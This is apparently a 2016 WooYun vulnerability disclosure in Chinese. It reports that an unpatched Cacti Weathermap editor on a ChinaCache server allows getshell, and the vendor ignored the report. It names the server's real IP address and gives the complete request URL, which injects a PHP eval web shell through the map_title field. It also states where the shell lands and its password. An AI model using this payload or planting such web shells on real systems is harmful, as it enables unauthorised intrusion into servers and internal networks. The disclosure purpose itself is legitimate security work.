破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

ChinaCache某系统补丁不及时导致getshell可威胁内网

编号220339
Urlhttp://www.wooyun.org/bug.php?action=view&id=220339
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题ChinaCache某系统补丁不及时导致getshell可威胁内网
漏洞类型系统/服务补丁不及时
厂商ChinaCache
白帽子路人甲
提交日期2016-06-17 21:28:00
公开日期2016-06-22 17:09:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank0
漏洞简介
补丁不及时导致getshell可威胁内网
漏洞细节

http://223.203.210.213/

QQ截图20160617203831.png


/plugins/weathermap/editor.php?plug=0&mapname=404.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=%3C?php%20echo%28md5%281%29%29;@eval%28$_POST[qjd]%29;?%3E&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name


直接生成shell
shell地址: plugins/weathermap/configs/404.php 口令: qjd

POC

QQ截图20160617203915.png


QQ截图20160617203935.png


光删马是没用的,重要的是补丁

QQ截图20160617204016.png

修复方案

删除shell,补丁

状态信息 2016-06-17: 细节已通知厂商并且等待厂商处理中
2016-06-22: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复http://www.wooyun.org/bugs/wooyun-2016-
已经报过的漏洞,乌云请加强审计。
回应信息危害等级:无影响厂商忽略忽略时间:2016-06-22 17:09